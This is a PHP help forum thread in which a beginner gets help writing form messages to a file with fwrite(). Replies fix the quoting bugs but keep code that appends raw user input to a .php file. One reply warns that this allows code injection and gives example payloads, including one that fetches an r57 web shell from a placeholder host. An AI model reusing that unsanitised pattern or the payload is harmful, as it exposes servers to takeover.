Problem with php fwrite()

[Reason7194]

Hello everyone, what I am trying to do with fwrite() is use it to post a message onto a "update board" that I have on my website. However, I am coming up with an error saying "Fatal error: Function name must be a string" on line 17 of my syntax. At this point, I am unable to solve this issue. If anyone could give me push in the correct direction, that would be very helpful.

The php ( It is php mixed with html ) code I need help with:

Code: Select all

    <?php include("Links.php");
    $message = $_POST('Message');

    $fw = fopen("supported.php","a");

    fwrite($fw,'$message');


    if(isset($message))
    //If the forum is filled out send the message.
    {

    $Message = $_POST['Message'];
    fwrite('$fw','$Message');

    }
    else  // If the post is not filled out display the post area.

    {

    echo " <form method='post' action='support.php'>
    <center>
    <br>
    <br>
      Username:<input name='username' type='text' /><br />
      Message:<br />
      <textarea name='message' rows='15' cols='40'>
      </textarea><br />
      <input type='submit' />
    </center>
      </form>";


This is my first attempt on using fwrite() and fopen(), so please feel free to tell me if I have done something horribly as well with my original problem.

-- Tue Mar 29, 2011 4:18 pm --

Ah, the problem was when I using " ( " instead of " [ ".

Another problem arises though, when a person enters a message, the 'message' that the user sent is viewed as "$message". The syntax prints out $message, not what the variable was holding. Why?

[Goatboy]

In response to your second post, it's because there is a difference between single and double quotes. Code:

Code: Select all

<?php

$message = "Hello, world!";

echo $message;     // Hello, world!
echo "$message";   // Hello, world!
echo '$message';   // $message
echo "'$message'"; // 'Hello, world!'
echo '"$message"'; // "$message"

?>


Single quotes are taken literally, and double quotes are parsed for variables.

[OnlyHuman]

Alright, I took a shot at rewriting this. It should function now. I haven't tested it, but it should work.

Code: Select all

<?php

   include("Links.php");

   if( isset($_POST['Message']) && ($_POST['Message'] != null) )
   {
      $message = $_POST['Message'];

      $fp = fopen("support.php","a");

      // no quotes here: Solves the problem of '$message' being
      // written to the file instead of the actual message content
      fwrite($fp, $message);

      fclose($fp);
   }

   echo "<form method='post' action='support.php'><center><br /><br />Username:<input name='username' type='text' /><br />Message:<br /><textarea name='message' rows='15' cols='40'></textarea><br /><input type='submit' /></center></form>";

?>


But, this is still really insecure code. Don't take that the wrong way. You're learning, it's cool. The main problem I see though, is that you're using the form action as the same file to store the the content of the message. That file is called and rendered by your CGI backend every time that form is submitted. If I were to make my message something like <?php phpinfo(); ?> or <?php echo file_get_contents("http://www.malicious-host.foo/r57.txt"); ?>, I could totally own your server. It would be better to store the messages into a separate file, or a database, and then filter it before it gets rendered.

[Reason7194]

O dear, well let us hope that you wont do that.

Thank you both for answering my 2cd question and for cleaning my code. On a different question, why does the message that the user sends want to go to a url instead of the file that I wants it to go to? 'It' want to go to the url support.php, but that does not exist. I actually wanted it to go to the file called support.php.

[Goatboy]

I'm not sure I understand your question. The reason for this behavior is probably because the file that you are writing to is the same one you are using to both display and process the form. Use one form to display and process the form, and write messages to a separate file.

[Reason7194]

If I understand correctly, I do believe I am using two different files to process and display the message.

After editing the code, I am now opening a different file called "contact.php" and using that to display. I left "support.php' in the form area to be used as the process. There is still the same error, "requested url is not found"

[Goatboy]

Try changing the file extension on the file you are writing to. If that doesn't work, check your permissions.

[OnlyHuman]

If I understand correctly, I do believe I am using two different files to process and display the message.

Yes, the two separate files are part of the problem. Another is the form action itself. It's set to call the file 'support.php' but the file that's calling it is using it's variables. That effectively gives both files access to separate variables that just happen to have the same names. But, only one of them is currently using them. And, if 'support.php' doesn't exist, your server will issue a 404 (your "not found" error).

All these issues can be fixed pretty simply, either by creating that file, and using the variables locally, or by altering the code slightly. This is just the same code I sent you a moment ago, but I'm posting it here as well for completeness. Check this out.

Code: Select all

<?php

   include("Links.php");

   // FIXED: Case sensitivity mismatch in original $_POST['message'].
   if( isset($_POST['message']) && ($_POST['message'] != null) )
   {
      // this should actually be filtered as well
      $message = $_POST['message'];

      $fp = fopen("support.php","a");

      // no quotes here: Solves the problem of '$message' being
      // written to the file instead of the actual message content
      fwrite($fp, $message);

      fclose($fp);
   }

   // form action is now THIS file
   echo "<form method='post' action=''><center><br /><br />Username:<input name='username' type='text' /><br />Message:<br /><textarea name='message' rows='15' cols='40'></textarea><br /><input type='submit' /></center></form>";

   // now to render the contents of support.php
   $fp = fopen("support.php","r");

   while( !feof($fp) )
   {
      $line = fgets($fp);

      $text = special_filter_function_defined_elsewhere($line);

      echo $text;
   }

   fclose($fp);

?>


That's a little bit better without actually defining what would be the perfect method for filtering user input. I left that function undefined, because there are a few ways to do it. And to secure something like what you're building here, it will most likely involve something custom. For instance, placing quotes around each line of the file, so that they're written as text, instead of interpretted as code, would help. But I'm sure there are other ways.

[Reason7194]

It works! Thank you all for your assistance!

[OnlyHuman]

It works! Thank you all for your assistance!

Hey, no problem.

Now it's just a matter of sanitizing the user input. For basic code injection, you could probably get away with using htmlentities or htmlspecialchars. Which are going to be far easier to use than any method based on what I mentioned before. In fact, just forget the whole quoted string thing. I wrote it when I was tired, it was based on something I was kind of halfassing at the moment, and I've slept since then. There's even a small filtering API, with a handful of functions that could prove useful. People can go in circles about the best one to use, and the best way to use them. For example, do you use htmlentities before placing data into a database, when first collecting input from the user, or right before you render output? Some prefer to scrap all of the standard filtering mechanisms and write their own. Whichever method works best for the implementation is probably you're best bet though.